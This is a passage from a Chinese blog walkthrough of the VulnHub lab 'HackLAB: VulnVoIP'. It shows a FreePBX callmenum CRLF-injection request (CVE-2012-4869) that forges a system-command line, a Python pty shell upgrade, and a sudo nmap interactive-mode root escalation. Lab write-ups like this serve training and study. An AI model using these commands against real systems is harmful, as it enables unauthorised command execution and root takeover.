<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">...callme_page.php?action=c&amp;callmenum=200@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20[PAYLOAD]</span><br></pre></td></tr></table></figure>

<p>可以看出来注入原理就是 <strong>CRLF</strong> 注入</p>
<p>代码中的 <code>%0D%0A</code> 代表回车换行。通过注入这两个字符，攻击者可以<strong>终结当前配置行并伪造新的配置行</strong></p>
<p>注入后的呼叫文件变成了：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">Channel</span><span class="punctuation">: </span>Local/200@from-internal/n  &lt;-- 原本的行</span><br><span class="line"><span class="attribute">Application</span><span class="punctuation">: </span>system                 &lt;-- 注入的行：修改任务为执行系统命令</span><br><span class="line"><span class="attribute">Data</span><span class="punctuation">: </span>[你的恶意代码]                 &lt;-- 注入的行：提供命令参数</span><br></pre></td></tr></table></figure>

<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><h3 id="Python-升级为交互式-Shell"><a href="#Python-升级为交互式-Shell" class="headerlink" title="Python 升级为交互式 Shell"></a>Python 升级为交互式 Shell</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c <span class="string">&#x27;import pty;pty.spawn(&quot;/bin/bash&quot;)&#x27;</span></span><br></pre></td></tr></table></figure>

<p>发现给了 <code>nmap</code> 和 <code>yum</code> 的高权限</p>
<p><img src="https://pic1.imgdb.cn/item/69794c35a3d6d770e81d86e0.png"></p>
<h3 id="NMap-交互模式提权"><a href="#NMap-交互模式提权" class="headerlink" title="NMap 交互模式提权"></a>NMap 交互模式提权</h3><p>利用其交互模式新建 Shell 提权</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> nmap --interactive</span><br><span class="line">!sh</span><br></pre></td></tr></table></figure>

<p><img src="https://pic1.imgdb.cn/item/69794cb1a3d6d770e81d86ec.png"></p>

    </div>
    <footer class="article-footer">
        <a class="article-category-link" href="/categories/VulnHub/" title="VulnHub" data-aos="zoom-in">VulnHub</a>

        <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/NMap-%E4%BA%A4%E4%BA%92%E6%A8%A1%E5%BC%8F%E6%8F%90%E6%9D%83/" rel="tag" title="NMap 交互模式提权">NMap 交互模式提权</a></li><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/Python-%E5%8D%87%E7%BA%A7%E4%B8%BA%E4%BA%A4%E4%BA%92%E5%BC%8F-Shell/" rel="tag" title="Python 升级为交互式 Shell">Python 升级为交互式 Shell</a></li><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/RCE/" rel="tag" title="RCE">RCE</a></li><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/%E5%BC%B1%E5%8F%A3%E4%BB%A4/" rel="tag" title="弱口令">弱口令</a></li></ul>

    </footer>
  </div>
    <nav id="article-nav" aria-label="Article navigation" data-aos="fade-up">
      <div class="article-nav-link-wrap left">
            <img data-src="/images/banner.webp" data-sizes="auto" alt="VulnHub LAMPSecurity：CTF7" class="lazyload">
        <a href="/2026/04/01/LAMPSecurity%20CTF7/" aria-label="前一篇: VulnHub LAMPSecurity：CTF7" title="前一篇: VulnHub LAMPSecurity：CTF7"></a>
        <div class="article-nav-caption">前一篇</div>
        <h3 class="article-nav-title">
            VulnHub LAMPSecurity：CTF7
        </h3>
      </div>
    <div class="article-nav-link-wrap right">
          <img data-src="/images/banner.webp" data-sizes="auto" alt="VulnHub HackLAB：Vulnix" class="lazyload">
      <a href="/2026/04/01/HackLAB%20Vulnix/" aria-label="后一篇: VulnHub HackLAB：Vulnix"  title="后一篇: VulnHub HackLAB：Vulnix"></a>
      <div class="article-nav-caption">后一篇</div>
      <h3 class="article-nav-title">
          VulnHub HackLAB：Vulnix
      </h3>
    </div>
  </nav>

</article>


</section>
        </div>
        <footer id="footer" aria-label="Site footer">
  <div style="width: 100%; overflow: hidden">
    <div class="footer-line"></div>
  </div>
  <div id="footer-info">
    <div>
      <span class="icon-copyright"></span>
        2020-2026
        <span class="footer-info-sep rotate"></span>
      ALL
    </div>
      <div>
        基于&nbsp;<a href="https://hexo.io/" rel="noopener nofollow noreferrer" target="_blank">Hexo</a>&nbsp;
        Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" rel="noopener nofollow noreferrer" target="_blank">Reimu</a>
      </div>
      <div>
        <span class="icon-brush"></span>
        55.9k
        &nbsp;|&nbsp;
        <span class="icon-coffee"></span>
        04:48
      </div>
      <div>
        <span class="icon-eye"></span>
        <span id="busuanzi_container_site_pv">总访问量&nbsp;<span id="busuanzi_value_site_pv"></span></span>
        &nbsp;|&nbsp;
        <span class="icon-user"></span>
        <span id="busuanzi_container_site_uv">总访客量&nbsp;<span id="busuanzi_value_site_uv"></span></span>
      </div>
  </div>
</footer>

          <div class="sidebar-top">
            <div class="sidebar-top-taichi rotate"></div>
            <div class="arrow-up"></div>
          </div>
        <div id="mask" class="hide"></div>
      </div>
      <nav id="mobile-nav" aria-label="Mobile navigation">
  <div class="sidebar-wrap">
        <div class="sidebar-toc-sidebar"><h3 class="toc-title">文章目录</h3>
<div class="sidebar-toc-wrapper toc-div-class" >
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#HackLAB-VulnVoIP"><span class="toc-number">1.</span> <span class="toc-text">HackLAB: VulnVoIP</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BC%B1%E5%8F%A3%E4%BB%A4"><span class="toc-number">1.1.</span> <span class="toc-text">弱口令</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Asterisk-PBX"><span class="toc-number">1.1.1.</span> <span class="toc-text">Asterisk PBX</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#FreePBX"><span class="toc-number">1.1.2.</span> <span class="toc-text">FreePBX</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#RCE"><span class="toc-number">1.2.</span> <span class="toc-text">RCE</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Upload-moudule%EF%BC%88-tgz-%E7%BB%95%E8%BF%87%EF%BC%89"><span class="toc-number">1.2.1.</span> <span class="toc-text">Upload moudule（.tgz 绕过）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#freepbx-callmenum%EF%BC%882012-4869%EF%BC%89"><span class="toc-number">1.2.2.</span> <span class="toc-text">freepbx_callmenum（2012-4869）</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8F%90%E6%9D%83"><span class="toc-number">1.3.</span> <span class="toc-text">提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Python-%E5%8D%87%E7%BA%A7%E4%B8%BA%E4%BA%A4%E4%BA%92%E5%BC%8F-Shell"><span class="toc-number">1.3.1.</span> <span class="toc-text">Python 升级为交互式 Shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#NMap-%E4%BA%A4%E4%BA%92%E6%A8%A1%E5%BC%8F%E6%8F%90%E6%9D%83"><span class="toc-number">1.3.2.</span> <span class="toc-text">NMap 交互模式提权</span></a></li></ol></li></ol></li></ol>
</div>
</div>
        <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="ALL" class="lazyload">
  <div class="sidebar-author-name">ALL</div>
  <div class="sidebar-description">雾島风起時の日常</div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">51</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">11</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">98</div>
  </div>
</div>
<div class="sidebar-social" >
    <div class="icon-github sidebar-social-icon">
      <a href=https://github.com/duckpigdog itemprop="url" target="_blank" aria-label="github" rel="noopener nofollow noreferrer"></a>
    </div>
    <div class="icon-bilibili sidebar-social-icon">
      <a href=https://space.bilibili.com/1337537884?spm_id_from=333.1007.0.0 itemprop="url" target="_blank" aria-label="bilibili" rel="noopener nofollow noreferrer"></a>
    </div>
</div>
<div class="sidebar-menu">
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">首页</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">归档</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">关于</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">友链</div>
      </div>
</div>
</div>
  </div>
      <div class="sidebar-btn-wrapper">
        <div class="sidebar-toc-btn current"></div>
        <div class="sidebar-common-btn"></div>
      </div>
</nav>

    </div>
    
<script src="https://npm.webcache.cn/lazysizes@5.3.2/lazysizes.min.js" integrity="sha384-3gT&#x2F;vsepWkfz&#x2F;ff7PpWNUeMzeWoH3cDhm&#x2F;A8jM7ouoAK0&#x2F;fP&#x2F;9bcHHR5kHq2nf+e" crossorigin="anonymous"></script>


<script src="https://npm.webcache.cn/clipboard@2.0.11/dist/clipboard.min.js" integrity="sha384-J08i8An&#x2F;QeARD9ExYpvphB8BsyOj3Gh2TSh1aLINKO3L0cMSH2dN3E22zFoXEi0Q" crossorigin="anonymous"></script>




<script src="/js/script.js"></script>


  
<script src="/js/aos.js"></script>

  <script>
    var aosInit = () => {
      AOS.init({
        duration: 1000,
        easing: "ease",
        once: true,
        offset: 50,
      });
    };
    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', aosInit);
    } else {
      aosInit();
    }
  </script>


<script src="/js/pjax_script.js" data-pjax></script>




  <script>
    var setupFirework = () => {
      if (!false || !window.matchMedia('(max-width: 768px)').matches) {
        window.firework && window.firework(JSON.parse('{"excludeElements":["a","button"],"particles":[{"shape":"circle","move":["emit"],"easing":"easeOutExpo","colors":["var(--red-1)","var(--red-2)","var(--red-3)","var(--red-4)"],"number":20,"duration":[1200,1800],"shapeOptions":{"radius":[16,32],"alpha":[0.3,0.5]}},{"shape":"circle","move":["diffuse"],"easing":"easeOutExpo","colors":["var(--red-0)"],"number":1,"duration":[1200,1800],"shapeOptions":{"radius":20,"alpha":[0.2,0.5],"lineWidth":6}}]}'));
      }
    }
  </script>
  
<script src="https://npm.webcache.cn/mouse-firework@0.2.0/dist/index.umd.js" integrity="sha384-qi9WggRt19tv8Vc7pCHW3ulMNLwrn515zaLEWZjl1px07vz8+pUoWX8n1rgq282T" crossorigin="anonymous" onload="setupFirework()" defer></script>






<div id="lazy-script">
  <div>
      
      
      <script data-pjax>
        window.REIMU_POST = {
          author: "ALL",
          title: "VulnHub HackLAB：VulnVoIP",
          url: "http://example.com/2026/04/01/HackLAB%20VulnVoIP/",
          excerpt: "",
          description: "",
          stripContent: "HackLAB: VulnVoIP项目地址：https://download.vulnhub.com/hacklab/vulnVoIP.7z 是一个打包好的镜像文件 注意：导入 vmx 时一定要选择我已移动，否则没网 使用 Nmap 扫描出开放服务及操作系统版本  基于 FreePBX (HTTP 80) + Asterisk (5038) + MySQL (3306)，AI 分析给出是 PBX 网络电话系统 对于这种终端设备，我们可以使用工具 svmap 扫描拿到精确的版本，下载地址 svma",
          date: "Wed Apr 01 2026 16:13:00 GMT+0800",
          updated: "Sat Apr 04 2026 16:38:54 GMT+0800",
          cover: "/images/banner.webp",
        };
      </script>
        
<script src="/js/insert_highlight.js" data-pjax></script>

      
<script src="/js/tabs.js" data-pjax defer></script>

      <script type="module" data-pjax>
        (async () => {
          const PhotoSwipeLightbox = (await safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe-lightbox.esm.min.js", "sha384-DiL6M/gG+wmTxmCRZyD1zee6lIhawn5TGvED0FOh7fXcN9B0aZ9dexSF/N6lrZi/")).default;
          const initPswp = (gallery, children) => {
            if (_$$(`${gallery} ${children}`).length > 0) {
              new PhotoSwipeLightbox({
                gallery,
                children,
                pswpModule: () => safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js", "sha384-WkkO3GCmgkC3VQWpaV8DqhKJqpzpF9JoByxDmnV8+oTJ7m3DfYEWX1fu1scuS4+s")
              }).init();
            }
          }
          const pswp = () => {
            initPswp('.article-entry', 'a.article-gallery-item');
            initPswp('.article-gallery', 'a.article-gallery-item');
          }
          pswp();
        })();
      </script>
        


  </div>
</div>


  <script>
    console.log(String.raw`%c 
 ______     ______     __     __    __     __  __    
/\  == \   /\  ___\   /\ \   /\ "-./  \   /\ \/\ \   
\ \  __<   \ \  __\   \ \ \  \ \ \-./\ \  \ \ \_\ \  
 \ \_\ \_\  \ \_____\  \ \_\  \ \_\ \ \_\  \ \_____\ 
  \/_/ /_/   \/_____/   \/_/   \/_/  \/_/   \/_____/ 
                                                  
`,'color: #ff5252;')
    console.log('%c Theme.Reimu v' + '1.12.3' + ' %c https://github.com/D-Sketon/hexo-theme-reimu ', 'color: white; background: #ff5252; padding:5px 0;', 'padding:4px;border:1px solid #ff5252;')
  </script>
  


  
<script src="https://npm.webcache.cn/busuanzi@2.3.0/bsz.pure.mini.js" integrity="sha384-0M75wtSkhjIInv4coYlaJU83+OypaRCIq2SukQVQX04eGTCBXJDuWAbJet56id+S" crossorigin="anonymous" async></script>


<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.getRegistrations().then((registrations) => {
      for (let registration of registrations) {
        registration.unregister();
      }
    });
  }
</script>




  </body>
  </html>
